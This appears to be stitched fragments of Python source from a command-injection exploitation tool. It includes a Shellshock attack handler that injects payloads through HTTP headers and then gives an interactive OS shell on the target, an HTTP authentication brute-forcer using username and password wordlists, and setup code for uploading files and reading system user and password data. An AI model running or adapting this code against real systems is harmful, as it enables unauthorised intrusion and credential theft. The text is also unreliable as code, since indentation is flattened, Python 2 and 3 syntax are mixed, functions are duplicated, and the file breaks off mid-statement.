def get_request_response(request): if settings.REVERSE_TCP == False and settings.BIND_TCP == False: headers.check_http_traffic(request) # Check if defined any HTTP Proxy. if menu.options.proxy: try: response = proxy.use_proxy(request) except _urllib.error.HTTPError as err_msg: if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR: response = False elif settings.IGNORE_ERR_MSG == False: err = str(err_msg) + "." if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \ settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None: print("") if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False: print("") print(settings.print_critical_msg(err)) continue_tests = checks.continue_tests(err_msg) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: raise SystemExit() response = False except _urllib.error.URLError as err_msg: if "Connection refused" in err_msg.reason: err_msg = "The target host is not responding. " err_msg += "Please ensure that is up and try again." if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \ settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None: print("") if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False: print("") print(settings.print_critical_msg(err_msg)) raise SystemExit() # Check if defined Tor. elif menu.options.tor: try: response = tor.use_tor(request) except _urllib.error.HTTPError as err_msg: if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR: response = False elif settings.IGNORE_ERR_MSG == False: err = str(err_msg) + "." if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \ settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None: print("") if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False: print("") print(settings.print_critical_msg(err)) continue_tests = checks.continue_tests(err_msg) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: raise SystemExit() response = False except _urllib.error.URLError as err_msg: err_msg = str(err_msg.reason).split(" ")[2:] err_msg = ' '.join(err_msg)+ "." if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False: print("") print(settings.print_critical_msg(err_msg)) raise SystemExit() else: try: response = _urllib.request.urlopen(request) except _urllib.error.HTTPError as err_msg: if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR: response = False elif settings.IGNORE_ERR_MSG == False: if not str(err_msg.code) == str(menu.options.ignore_code): err = str(err_msg) + "." # if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \ # settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None: # print "f" # elif settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False: # print "s" if settings.VERBOSITY_LEVEL < 2: print("\r" + settings.print_critical_msg(err) + 30 * " ") continue_tests = checks.continue_tests(err_msg) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: raise SystemExit() response = False except _urllib.error.URLError as err_msg: err_msg = str(err_msg.reason).split(" ")[2:] err_msg = ' '.join(err_msg)+ "." if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False: print("") print(settings.print_critical_msg(err_msg)) raise SystemExit() else: response = headers.check_http_traffic(request) return response
def shellshock_handler(url, http_request_method, filename): counter = 1 vp_flag = True no_result = True export_injection_info = False injection_type = "results-based command injection" technique = "shellshock injection technique" info_msg = "Testing the " + technique + "... " if settings.VERBOSITY_LEVEL > 1: info_msg = info_msg + "\n" sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() try: i = 0 total = len(shellshock_cves) * len(headers) for cve in shellshock_cves: for check_header in headers: # Check injection state settings.DETECTION_PHASE = True settings.EXPLOITATION_PHASE = False i = i + 1 attack_vector = "echo " + cve + ":Done;" payload = shellshock_payloads(cve, attack_vector) # Check if defined "--verbose" option. if settings.VERBOSITY_LEVEL == 1: sys.stdout.write("\n" + settings.print_payload(payload)) elif settings.VERBOSITY_LEVEL > 1: info_msg = "Generating a payload for injection..." print settings.print_info_msg(info_msg) print settings.print_payload(payload) header = {check_header : payload} request = urllib2.Request(url, None, header) if check_header == "User-Agent": menu.options.agent = payload else: menu.options.agent = default_user_agent log_http_headers.do_check(request) log_http_headers.check_http_traffic(request) # Check if defined any HTTP Proxy. if menu.options.proxy: response = proxy.use_proxy(request) # Check if defined Tor. elif menu.options.tor: response = tor.use_tor(request) else: response = urllib2.urlopen(request) percent = ((i*100)/total) float_percent = "{0:.1f}".format(round(((i*100)/(total*1.0)),2)) if str(float_percent) == "100.0": if no_result == True: percent = Fore.RED + "FAILED" + Style.RESET_ALL else: percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL no_result = False elif len(response.info()) > 0 and cve in response.info(): percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL no_result = False elif len(response.read()) > 0 and cve in response.read(): percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL no_result = False else: percent = str(float_percent )+ "%" if not settings.VERBOSITY_LEVEL >= 1: info_msg = "Testing the " + technique + "... " + "[ " + percent + " ]" sys.stdout.write("\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() if no_result == False: # Check injection state settings.DETECTION_PHASE = False settings.EXPLOITATION_PHASE = True # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique) vuln_parameter = "HTTP Header" the_type = " " + vuln_parameter check_header = " " + check_header vp_flag = logs.add_parameter(vp_flag, filename, the_type, check_header, http_request_method, vuln_parameter, payload) check_header = check_header[1:] logs.update_payload(filename, counter, payload) if settings.VERBOSITY_LEVEL >= 1: checks.total_of_requests() success_msg = "The (" + check_header + ") '" success_msg += url + Style.RESET_ALL + Style.BRIGHT success_msg += "' seems vulnerable via " + technique + "." if settings.VERBOSITY_LEVEL <= 1: print "" print settings.print_success_msg(success_msg) print settings.SUB_CONTENT_SIGN + "Payload: " + "\"" + payload + "\"" + Style.RESET_ALL # Enumeration options. if settings.ENUMERATION_DONE == True : if settings.VERBOSITY_LEVEL >= 1: print "" while True: if not menu.options.batch: question_msg = "Do you want to enumerate again? [Y/n] > " sys.stdout.write(settings.print_question_msg(question_msg)) enumerate_again = sys.stdin.readline().replace("\n","").lower() else: enumerate_again = "" if len(enumerate_again) == 0: enumerate_again = "y" if enumerate_again in settings.CHOICE_YES: enumeration(url, cve, check_header, filename) break elif enumerate_again in settings.CHOICE_NO: break elif enumerate_again in settings.CHOICE_QUIT: raise SystemExit() else: err_msg = "'" + enumerate_again + "' is not a valid answer." print settings.print_error_msg(err_msg) pass else: enumeration(url, cve, check_header, filename) # File access options. if settings.FILE_ACCESS_DONE == True : while True: if not menu.options.batch: question_msg = "Do you want to access files again? [Y/n] > " sys.stdout.write(settings.print_question_msg(question_msg)) file_access_again = sys.stdin.readline().replace("\n","").lower() else: file_access_again= "" if len(file_access_again) == 0: file_access_again = "y" if file_access_again in settings.CHOICE_YES: file_access(url, cve, check_header, filename) break elif file_access_again in settings.CHOICE_NO: break elif file_access_again in settings.CHOICE_QUIT: raise SystemExit() else: err_msg = "'" + file_access_again + "' is not a valid answer." print settings.print_error_msg(err_msg) pass else: file_access(url, cve, check_header, filename) if menu.options.os_cmd: cmd = menu.options.os_cmd shell, payload = cmd_exec(url, cmd, cve, check_header, filename) print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL raise SystemExit() else: # Pseudo-Terminal shell print "" go_back = False go_back_again = False while True: if go_back == True: break if not menu.options.batch: question_msg = "Do you want a Pseudo-Terminal shell? [Y/n] > " sys.stdout.write(settings.print_question_msg(question_msg)) gotshell = sys.stdin.readline().replace("\n","").lower() else: gotshell= "" if len(gotshell) == 0: gotshell= "y" if gotshell in settings.CHOICE_YES: if not menu.options.batch: print "" print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)" if readline_error: checks.no_readline_module() while True: try: if not readline_error: # Tab compliter readline.set_completer(menu.tab_completer) # MacOSX tab compliter if getattr(readline, '__doc__', '') is not None and 'libedit' in getattr(readline, '__doc__', ''): readline.parse_and_bind("bind ^I rl_complete") # Unix tab compliter else: readline.parse_and_bind("tab: complete") cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """) cmd = checks.escaped_cmd(cmd) if cmd.lower() in settings.SHELL_OPTIONS: os_shell_option = checks.check_os_shell_options(cmd.lower(), technique, go_back, no_result) go_back, go_back_again = check_options(url, cmd, cve, check_header, filename, os_shell_option, http_request_method, go_back, go_back_again) if go_back: break else: shell, payload = cmd_exec(url, cmd, cve, check_header, filename) if shell != "": # Update logs with executed cmds and execution results. logs.executed_command(filename, cmd, shell) print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n" else: info_msg = "Executing the '" + cmd + "' command... " if settings.VERBOSITY_LEVEL == 1: sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() sys.stdout.write("\n" + settings.print_payload(payload)+ "\n") elif settings.VERBOSITY_LEVEL > 1: sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() sys.stdout.write("\n" + settings.print_payload(payload)+ "\n") err_msg = "The '" + cmd + "' command, does not return any output." print settings.print_critical_msg(err_msg) + "\n" except KeyboardInterrupt: raise except SystemExit: raise except EOFError: err_msg = "Exiting, due to EOFError." print settings.print_error_msg(err_msg) raise except: info_msg = "Testing the " + technique + "... " if settings.VERBOSITY_LEVEL > 1: info_msg = info_msg + "\n" sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() break elif gotshell in settings.CHOICE_NO: if checks.next_attack_vector(technique, go_back) == True: break else: if no_result == True: return False else: return True elif gotshell in settings.CHOICE_QUIT: raise SystemExit() else: err_msg = "'" + gotshell + "' is not a valid answer." print settings.print_error_msg(err_msg) continue break else: continue if no_result and settings.VERBOSITY_LEVEL < 2: print "" except urllib2.HTTPError, err_msg: if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR: response = False elif settings.IGNORE_ERR_MSG == False: err = str(err_msg) + "." print "\n" + settings.print_critical_msg(err) continue_tests = checks.continue_tests(err_msg) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: raise SystemExit()
def examine_request(request): try: headers.check_http_traffic(request) # Check if defined any HTTP Proxy (--proxy option). if menu.options.proxy: return proxy.use_proxy(request) # Check if defined Tor (--tor option). elif menu.options.tor: return tor.use_tor(request) else: try: return urllib2.urlopen(request) except SocketError as e: if e.errno == errno.ECONNRESET: error_msg = "Connection reset by peer." print settings.print_critical_msg(error_msg) elif e.errno == errno.WSAECONNRESET: error_msg = "An existing connection was forcibly closed by the remote host." print settings.print_critical_msg(error_msg) raise SystemExit() except ValueError: # Invalid format for the '--header' option. if settings.VERBOSITY_LEVEL < 2: print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" err_msg = "Use '--header=\"HEADER_NAME: HEADER_VALUE\"'" err_msg += "to provide an extra HTTP header or" err_msg += " '--header=\"HEADER_NAME: " + settings.WILDCARD_CHAR + "\"' " err_msg += "if you want to try to exploit the provided HTTP header." print settings.print_critical_msg(err_msg) raise SystemExit() except Exception as err_msg: if "Unauthorized" in str(err_msg): if menu.options.ignore_401: pass elif menu.options.auth_type and menu.options.auth_cred: err_msg = "The provided pair of " + menu.options.auth_type err_msg += " HTTP authentication credentials '" + menu.options.auth_cred + "'" err_msg += " seems to be invalid." print settings.print_critical_msg(err_msg) raise SystemExit() else: try: error_msg = str(err_msg.args[0]).split("] ")[1] + "." except IndexError: error_msg = str(err_msg).replace(": "," (") + ")." print settings.print_critical_msg(error_msg) raise SystemExit() except urllib2.HTTPError, err_msg: error_description = "" if len(str(err_msg).split(": ")[1]) == 0: error_description = "Non-standard HTTP status code" err_msg = str(err_msg).replace(": "," (") + error_description + ")." if menu.options.bulkfile: warn_msg = "Skipping URL '" + url + "' - " + err_msg print settings.print_warning_msg(warn_msg) if settings.EOF: print "" return False else: print settings.print_critical_msg(err_msg) raise SystemExit
def main(filename, url): try: # Ignore the mathematic calculation part (Detection phase). if menu.options.skip_calc: settings.SKIP_CALC = True # Target URL reload. if menu.options.url_reload and menu.options.data: settings.URL_RELOAD = True # Check provided parameters for tests if menu.options.test_parameter: if menu.options.test_parameter.startswith("="): menu.options.test_parameter = menu.options.test_parameter[1:] settings.TEST_PARAMETER = menu.options.test_parameter.split( settings.PARAMETER_SPLITTING_REGEX) for i in range(0, len(settings.TEST_PARAMETER)): if "=" in settings.TEST_PARAMETER[i]: settings.TEST_PARAMETER[i] = settings.TEST_PARAMETER[ i].split("=")[0] # Check if defined character used for splitting parameter values. if menu.options.pdel: settings.PARAMETER_DELIMITER = menu.options.pdel # Check if defined character used for splitting cookie values. if menu.options.cdel: settings.COOKIE_DELIMITER = menu.options.cdel # Check if specified wrong injection technique if menu.options.tech and menu.options.tech not in settings.AVAILABLE_TECHNIQUES: found_tech = False # Convert injection technique(s) to lowercase menu.options.tech = menu.options.tech.lower() # Check if used the ',' separator if settings.PARAMETER_SPLITTING_REGEX in menu.options.tech: split_techniques_names = menu.options.tech.split( settings.PARAMETER_SPLITTING_REGEX) else: split_techniques_names = menu.options.tech.split() if split_techniques_names: for i in range(0, len(split_techniques_names)): if len(menu.options.tech) <= 4: split_first_letter = list(menu.options.tech) for j in range(0, len(split_first_letter)): if split_first_letter[ j] in settings.AVAILABLE_TECHNIQUES: found_tech = True else: found_tech = False if split_techniques_names[i].replace(' ', '') not in settings.AVAILABLE_TECHNIQUES and \ found_tech == False: err_msg = "You specified wrong value '" + split_techniques_names[ i] err_msg += "' as injection technique. " err_msg += "The value, must be a string composed by the letters (C)lassic, (E)val-based, " err_msg += "(T)ime-based, (F)ile-based (with or without commas)." print settings.print_critical_msg(err_msg) sys.exit(0) # Check if specified wrong alternative shell if menu.options.alter_shell: if menu.options.alter_shell.lower( ) not in settings.AVAILABLE_SHELLS: err_msg = "'" + menu.options.alter_shell + "' shell is not supported!" print settings.print_critical_msg(err_msg) sys.exit(0) # Check the file-destination if menu.options.file_write and not menu.options.file_dest or \ menu.options.file_upload and not menu.options.file_dest: err_msg = "Host's absolute filepath to write and/or upload, must be specified (--file-dest)." print settings.print_critical_msg(err_msg) sys.exit(0) if menu.options.file_dest and menu.options.file_write == None and menu.options.file_upload == None: err_msg = "You must enter the '--file-write' or '--file-upload' parameter." print settings.print_critical_msg(err_msg) sys.exit(0) # Check if defined "--random-agent" option. if menu.options.random_agent: menu.options.agent = random.choice(settings.USER_AGENT_LIST) # Check if defined "--url" or "-m" option. if url: # Check if http / https url = checks.check_http_s(url) # Load the crawler if menu.options.crawldepth > 0 or menu.options.sitemap_url: if menu.options.crawldepth > 0: menu.options.DEFAULT_CRAWLDEPTH_LEVEL = menu.options.crawldepth else: if menu.options.sitemap_url: while True: if not menu.options.batch: question_msg = "Do you want to change the crawling depth level? [Y/n] > " sys.stdout.write( settings.print_question_msg(question_msg)) change_depth_level = sys.stdin.readline( ).replace("\n", "").lower() else: change_depth_level = "" if len(change_depth_level) == 0: change_depth_level = "y" if change_depth_level in settings.CHOICE_YES or change_depth_level in settings.CHOICE_NO: break elif change_depth_level in settings.CHOICE_QUIT: sys.exit(0) else: err_msg = "'" + change_depth_level + "' is not a valid answer." print settings.print_error_msg(err_msg) pass # Change the crawling depth level. if change_depth_level in settings.CHOICE_YES: while True: question_msg = "Please enter the crawling depth level (1-2) > " sys.stdout.write( settings.print_question_msg(question_msg)) depth_level = sys.stdin.readline().replace( "\n", "").lower() if int(depth_level) >= 3: err_msg = "Depth level '" + depth_level + "' is not a valid answer." print settings.print_error_msg(err_msg) pass else: menu.options.DEFAULT_CRAWLDEPTH_LEVEL = depth_level break # Crawl the url. url = crawler.crawler(url) try: # Check if defined POST data if menu.options.data: request = urllib2.Request(url, menu.options.data) else: request = urllib2.Request(url) headers.do_check(request) #headers.check_http_traffic(request) # Check if defined any HTTP Proxy (--proxy option). if menu.options.proxy: proxy.do_check(url) # Check if defined Tor (--tor option). elif menu.options.tor: tor.do_check() if menu.options.flush_session: session_handler.flush(url) info_msg = "Checking connection to the target URL... " sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() if settings.VERBOSITY_LEVEL >= 2: print "" headers.check_http_traffic(request) try: # Check if defined any HTTP Proxy (--proxy option). if menu.options.proxy: response = proxy.use_proxy(request) # Check if defined Tor (--tor option). elif menu.options.tor: response = tor.use_tor(request) else: try: response = urllib2.urlopen(request) except ValueError: # Invalid format for the '--headers' option. if settings.VERBOSITY_LEVEL < 2: print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" err_msg = "Use '--headers=\"HEADER_NAME:HEADER_VALUE\"' " err_msg += "to provide an HTTP header or" err_msg += " '--headers=\"HEADER_NAME:" + settings.WILDCARD_CHAR + "\"' " err_msg += "if you want to try to exploit the provided HTTP header." print settings.print_critical_msg(err_msg) sys.exit(0) except urllib2.HTTPError, e: if settings.VERBOSITY_LEVEL < 2: print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" err_msg = str(e).replace(": ", " (") + ")." print settings.print_critical_msg(err_msg) raise SystemExit html_data = content = response.read() if settings.VERBOSITY_LEVEL < 2: print "[ " + Fore.GREEN + "SUCCEED" + Style.RESET_ALL + " ]" # Check for CGI scripts on url checks.check_CGI_scripts(url) # Modification on payload if not menu.options.shellshock: #settings.CURRENT_USER = "******" + settings.CURRENT_USER + ")" settings.SYS_USERS = "echo $(" + settings.SYS_USERS + ")" settings.SYS_PASSES = "echo $(" + settings.SYS_PASSES + ")" # Check if defined "--file-upload" option. if menu.options.file_upload: if not re.match(settings.VALID_URL_FORMAT, menu.options.file_upload): # Check if not defined URL for upload. while True: if not menu.options.batch: question_msg = "Do you want to enable an HTTP server? [Y/n] > " sys.stdout.write( settings.print_question_msg(question_msg)) enable_HTTP_server = sys.stdin.readline( ).replace("\n", "").lower() else: enable_HTTP_server == "" if len(enable_HTTP_server) == 0: enable_HTTP_server = "y" if enable_HTTP_server in settings.CHOICE_YES: # Check if file exists if not os.path.isfile( menu.options.file_upload): err_msg = "The '" + menu.options.file_upload + "' file, does not exists." sys.stdout.write( settings.print_critical_msg(err_msg) + "\n") sys.exit(0) if settings.LOCAL_HTTP_IP == None: while True: question_msg = "Please enter your interface IP address > " sys.stdout.write( settings.print_question_msg( question_msg)) ip_addr = sys.stdin.readline().replace( "\n", "").lower() # check if IP address is valid ip_check = simple_http_server.is_valid_ipv4( ip_addr) if ip_check == False: err_msg = "The provided IP address seems not valid." print settings.print_error_msg( err_msg) pass else: settings.LOCAL_HTTP_IP = ip_addr break http_server = "http://" + str( settings.LOCAL_HTTP_IP) + ":" + str( settings.LOCAL_HTTP_PORT) + "/" info_msg = "Setting the HTTP server on '" + http_server + "'. " print settings.print_info_msg(info_msg) menu.options.file_upload = http_server + menu.options.file_upload simple_http_server.main() break elif enable_HTTP_server in settings.CHOICE_NO: if not re.match(settings.VALID_URL_FORMAT, menu.options.file_upload): err_msg = "The '" + menu.options.file_upload + "' is not a valid URL. " print settings.print_critical_msg(err_msg) sys.exit(0) break elif enable_HTTP_server in settings.CHOICE_QUIT: sys.exit(0) else: err_msg = "'" + enable_HTTP_server + "' is not a valid answer." print settings.print_error_msg(err_msg) pass try: urllib2.urlopen(menu.options.file_upload) except urllib2.HTTPError, err_msg: print settings.print_critical_msg(str(err_msg.code)) sys.exit(0) except urllib2.URLError, err_msg: print settings.print_critical_msg( str(err_msg.args[0]).split("] ")[1] + ".") sys.exit(0)
def http_auth_cracker(url, realm): # Define the HTTP authentication type. authentication_type = menu.options.auth_type # Define the authentication wordlists for usernames / passwords. usernames, passwords = define_wordlists() i = 1 found = False total = len(usernames) * len(passwords) for username in usernames: for password in passwords: float_percent = "{0:.1f}%".format(round(((i*100)/(total*1.0)),2)) # Check if verbose mode on if settings.VERBOSITY_LEVEL >= 1: payload = "" + username + ":" + password + "" if settings.VERBOSITY_LEVEL > 1: print(settings.print_checking_msg(payload)) else: sys.stdout.write("\r" + settings.print_checking_msg(payload) + " " * 10) sys.stdout.flush() try: # Basic authentication if authentication_type.lower() == "basic": request = _urllib.request.Request(url) base64string = base64.encodestring(username + ":" + password)[:-1] request.add_header("Authorization", "Basic " + base64string) headers.do_check(request) headers.check_http_traffic(request) # Check if defined any HTTP Proxy (--proxy option). if menu.options.proxy: proxy.use_proxy(request) # Check if defined Tor (--tor option). elif menu.options.tor: tor.use_tor(request) result = _urllib.request.urlopen(request) # Digest authentication elif authentication_type.lower() == "digest": authhandler = _urllib.request.HTTPDigestAuthHandler() authhandler.add_password(realm, url, username, password) opener = _urllib.request.build_opener(authhandler) _urllib.request.install_opener(opener) request = _urllib.request.Request(url) headers.check_http_traffic(request) # Check if defined any HTTP Proxy (--proxy option). if menu.options.proxy: proxy.use_proxy(request) # Check if defined Tor (--tor option). elif menu.options.tor: tor.use_tor(request) result = _urllib.request.urlopen(request) # Store valid results to session admin_panel = url session_handler.import_valid_credentials(url, authentication_type, admin_panel, username, password) found = True except KeyboardInterrupt : raise except: pass if found: if not settings.VERBOSITY_LEVEL >= 1: float_percent = settings.SUCCESS_MSG else: if str(float_percent) == "100.0%": if not settings.VERBOSITY_LEVEL >= 1: float_percent = settings.FAIL_STATUS else: i = i + 1 float_percent = ".. (" + float_percent + ")" if not settings.VERBOSITY_LEVEL >= 1: info_msg = "Checking for a valid pair of credentials." info_msg += float_percent sys.stdout.write("\r\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() if found: valid_pair = "" + username + ":" + password + "" if not settings.VERBOSITY_LEVEL > 1: print("") success_msg = "Identified a valid pair of credentials '" success_msg += valid_pair + Style.RESET_ALL + Style.BRIGHT + "'." print(settings.print_success_msg(success_msg)) return valid_pair err_msg = "Use the '--auth-cred' option to provide a valid pair of " err_msg += "HTTP authentication credentials (i.e --auth-cred=\"admin:admin\") " err_msg += "or place an other dictionary into '" err_msg += os.path.abspath(os.path.join(os.path.dirname(__file__), '..', 'txt')) + "/' directory." print("\n" + settings.print_critical_msg(err_msg)) return False # eof
def main(): try: # Check if defined "--version" option. if menu.options.version: version.show_version() sys.exit(0) # Checkall the banner menu.banner() # Check python version number. version.python_version() # Check if defined "--dependencies" option. # For checking (non-core) third party dependenices. if menu.options.noncore_dependencies: checks.third_party_dependencies() sys.exit(0) # Check if defined "--update" option. if menu.options.update: update.updater() # Check if defined "--install" option. if menu.options.install: install.installer() sys.exit(0) # Check arguments if len(sys.argv) == 1: menu.parser.print_help() print "" sys.exit(0) # Define the level of verbosity. if menu.options.verbose > 4: err_msg = "The value for option '-v' " err_msg += "must be an integer value from range [0, 4]." print settings.print_critical_msg(err_msg) sys.exit(0) else: settings.VERBOSITY_LEVEL = menu.options.verbose # Check if defined "--delay" option. if menu.options.delay > "0": settings.DELAY = menu.options.delay # Define the level of tests to perform. if menu.options.level > 3: err_msg = "The value for option '--level' " err_msg += "must be an integer value from range [1, 3]." print settings.print_critical_msg(err_msg) sys.exit(0) # Define the local path where Metasploit Framework is installed. if menu.options.msf_path: settings.METASPLOIT_PATH = menu.options.msf_path # Parse target / data from HTTP proxy logs (i.e Burp / WebScarab). if menu.options.logfile: parser.logfile_parser() # Ignore the mathematic calculation part (Detection phase). if menu.options.skip_calc: settings.SKIP_CALC = True # Target URL reload. if menu.options.url_reload and menu.options.data: settings.URL_RELOAD = True # Check provided parameters for tests if menu.options.test_parameter: if menu.options.test_parameter.startswith("="): menu.options.test_parameter = menu.options.test_parameter[1:] settings.TEST_PARAMETER = menu.options.test_parameter.split(settings.PARAMETER_SPLITTING_REGEX) for i in range(0,len(settings.TEST_PARAMETER)): if "=" in settings.TEST_PARAMETER[i]: settings.TEST_PARAMETER[i] = settings.TEST_PARAMETER[i].split("=")[0] # Check if ".git" exists and check for updated version! if os.path.isdir("./.git") and settings.CHECK_FOR_UPDATES_ON_START: update.check_for_update() # Check if defined character used for splitting parameter values. if menu.options.pdel: settings.PARAMETER_DELIMITER = menu.options.pdel # Check if defined character used for splitting cookie values. if menu.options.cdel: settings.COOKIE_DELIMITER = menu.options.cdel # Check if specified wrong injection technique if menu.options.tech and menu.options.tech not in settings.AVAILABLE_TECHNIQUES: found_tech = False # Convert injection technique(s) to lowercase menu.options.tech = menu.options.tech.lower() # Check if used the ',' separator if settings.PARAMETER_SPLITTING_REGEX in menu.options.tech: split_techniques_names = menu.options.tech.split(settings.PARAMETER_SPLITTING_REGEX) else: split_techniques_names = menu.options.tech.split() if split_techniques_names: for i in range(0,len(split_techniques_names)): if len(menu.options.tech) <= 4: split_first_letter = list(menu.options.tech) for j in range(0,len(split_first_letter)): if split_first_letter[j] in settings.AVAILABLE_TECHNIQUES: found_tech = True else: found_tech = False if split_techniques_names[i].replace(' ', '') not in settings.AVAILABLE_TECHNIQUES and \ found_tech == False: err_msg = "You specified wrong value '" + split_techniques_names[i] err_msg += "' as injection technique. " err_msg += "The value, must be a string composed by the letters (C)lassic, (E)val-based, " err_msg += "(T)ime-based, (F)ile-based (with or without commas)." print settings.print_critical_msg(err_msg) sys.exit(0) # Check if specified wrong alternative shell if menu.options.alter_shell: if menu.options.alter_shell.lower() not in settings.AVAILABLE_SHELLS: err_msg = "'" + menu.options.alter_shell + "' shell is not supported!" print settings.print_critical_msg(err_msg) sys.exit(0) # Check the file-destination if menu.options.file_write and not menu.options.file_dest or \ menu.options.file_upload and not menu.options.file_dest: err_msg = "Host's absolute filepath to write and/or upload, must be specified (--file-dest)." print settings.print_critical_msg(err_msg) sys.exit(0) if menu.options.file_dest and menu.options.file_write == None and menu.options.file_upload == None : err_msg = "You must enter the '--file-write' or '--file-upload' parameter." print settings.print_critical_msg(err_msg) sys.exit(0) # Check if defined "--random-agent" option. if menu.options.random_agent: menu.options.agent = random.choice(settings.USER_AGENT_LIST) # Check if defined "--url" option. if menu.options.url: url = menu.options.url # Check if http / https url = checks.check_http_s(url) # Load the crawler if menu.options.crawldepth > 0: menu.options.DEFAULT_CRAWLDEPTH_LEVEL = menu.options.crawldepth url = crawler.crawler(url) if menu.options.output_dir: output_dir = menu.options.output_dir else: output_dir = settings.OUTPUT_DIR # One directory up, if Windows or if the script is being run under "/src". if settings.IS_WINDOWS or "/src" in os.path.dirname(os.path.abspath(__file__)): os.chdir("..") output_dir = os.path.dirname(output_dir) try: os.stat(output_dir) except: os.mkdir(output_dir) # The logs filename construction. filename = logs.create_log_file(url, output_dir) try: # Check if defined POST data if menu.options.data: request = urllib2.Request(url, menu.options.data) else: request = urllib2.Request(url) headers.do_check(request) #headers.check_http_traffic(request) # Check if defined any HTTP Proxy (--proxy option). if menu.options.proxy: proxy.do_check(url) # Check if defined Tor (--tor option). elif menu.options.tor: tor.do_check() if menu.options.flush_session: session_handler.flush(url) info_msg = "Checking connection to the target URL... " sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() if settings.VERBOSITY_LEVEL >= 2: print "" headers.check_http_traffic(request) try: # Check if defined any HTTP Proxy (--proxy option). if menu.options.proxy: response = proxy.use_proxy(request) # Check if defined Tor (--tor option). elif menu.options.tor: response = tor.use_tor(request) else: try: response = urllib2.urlopen(request) except ValueError: # Invalid format for the '--headers' option. if settings.VERBOSITY_LEVEL < 2: print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" err_msg = "Use '--headers=\"HEADER_NAME:HEADER_VALUE\"' " err_msg += "to provide an HTTP header or" err_msg += " '--headers=\"HEADER_NAME:" + settings.WILDCARD_CHAR + "\"' " err_msg += "if you want to try to exploit the provided HTTP header." print settings.print_critical_msg(err_msg) sys.exit(0) except: raise html_data = content = response.read() if settings.VERBOSITY_LEVEL < 2: print "[ " + Fore.GREEN + "SUCCEED" + Style.RESET_ALL + " ]" # Check for CGI scripts on url checks.check_CGI_scripts(url) # Modification on payload if not menu.options.shellshock: #settings.CURRENT_USER = "******" + settings.CURRENT_USER + ")" settings.SYS_USERS = "echo $(" + settings.SYS_USERS + ")" settings.SYS_PASSES = "echo $(" + settings.SYS_PASSES + ")" # Check if defined "--file-upload" option. if menu.options.file_upload: if not re.match(settings.VALID_URL_FORMAT, menu.options.file_upload): # Check if not defined URL for upload. while True: question_msg = "Do you want to enable an HTTP server? [Y/n/q] > " sys.stdout.write(settings.print_question_msg(question_msg)) enable_HTTP_server = sys.stdin.readline().replace("\n","").lower() if len(enable_HTTP_server) == 0: enable_HTTP_server = "y" if enable_HTTP_server in settings.CHOICE_YES: # Check if file exists if not os.path.isfile(menu.options.file_upload): err_msg = "The '" + menu.options.file_upload + "' file, does not exists." sys.stdout.write(settings.print_critical_msg(err_msg) + "\n") sys.exit(0) http_server = "http://" + str(settings.LOCAL_HTTP_IP) + ":" + str(settings.LOCAL_HTTP_PORT) + "/" info_msg = "Setting the HTTP server on '" + http_server + "'. " print settings.print_info_msg(info_msg) menu.options.file_upload = http_server + menu.options.file_upload simple_http_server.main() break elif enable_HTTP_server in settings.CHOICE_NO: if not re.match(settings.VALID_URL_FORMAT, menu.options.file_upload): err_msg = "The '" + menu.options.file_upload + "' is not a valid URL. " print settings.print_critical_msg(err_msg) sys.exit(0) break elif enable_HTTP_server in settings.CHOICE_QUIT: sys.exit(0) else: err_msg = "'" + enable_HTTP_server + "' is not a valid answer." print settings.print_error_msg(err_msg) pass try: urllib2.urlopen(menu.options.file_upload) except urllib2.HTTPError, err_msg: print settings.print_critical_msg(err_msg) sys.exit(0) except urllib2.URLError, err_msg: print settings.print_critical_msg(err_msg) sys.exit(0) # Used a valid pair of valid credentials if menu.options.auth_cred: success_msg = Style.BRIGHT + "Identified a valid pair of credentials '" success_msg += menu.options.auth_cred + Style.RESET_ALL success_msg += Style.BRIGHT + "'." + Style.RESET_ALL print settings.print_success_msg(success_msg) try: if response.info()['server'] : server_banner = response.info()['server'] found_os_server = False if menu.options.os and 